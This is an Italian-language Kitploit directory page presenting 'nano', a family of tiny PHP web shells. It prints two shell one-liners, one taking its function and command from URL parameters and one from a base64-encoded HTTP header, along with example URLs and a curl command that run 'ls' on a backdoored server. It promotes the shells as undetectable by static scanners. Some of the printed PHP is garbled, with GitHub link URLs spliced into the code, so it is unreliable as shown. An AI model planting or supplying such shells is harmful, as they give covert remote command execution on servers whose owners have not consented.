Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
nano — Nano è una famiglia di web shell PHP che sono code golfed per la stealth. | Kitploit
Strumenti/GitHubGitHub/s0md3v/nano
Generazione di PayloadShellcodeSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubs0md3v/nano

nano

Nano è una famiglia di web shell PHP che sono code golfed per la stealth.

Vedi Repository
449916 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

nano

Nano è una famiglia di webshell PHP ottimizzate con code golf per essere estremamente furtive ed efficienti.
Mettilo sotto osservazione, forse continuerò a caricare altre webshell qui.

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);

Caratteristiche

  • 35 byte di dimensione
  • Non rilevabile da scanner di codice statici
  • Supporta l'autenticazione

Utilizzo

http://example.com/nano.php?f=function&c=command&p=password

f è per la funzione
c è per il comando
p è per la password

Ad esempio, il codice seguente eseguirà il comando ls:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);

Caratteristiche

  • 93 byte di dimensione
  • Completamente non rilevabile

Utilizzo

Questo è un po' complesso.
Supponiamo che tu voglia eseguire system(ls), quindi scrivilo come system~ls e poi codificalo in base64, cioè c3lzdGVtKGxzKQ==
Ora aggiungi un qualsiasi carattere 1 all'inizio. Diciamo 'x', quindi sarà xc3lzdGVtKGxzKQ==
Ora apri il tuo terminale e digita il seguente comando
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Troppo lavoro? Puoi usare il handler invece.

gestore

Tutto il resto

Questa è la mia prima cosa in PHP, quindi se c'è un modo per fare ciò che ho fatto in modo migliore, per favore fammelo sapere o apri una pull request.
Il progetto nano è concesso in licenza MIT, il che significa fondamentalmente che devi darmi credito se vuoi ridistribuirlo o modificarlo.

Scarica lo strumento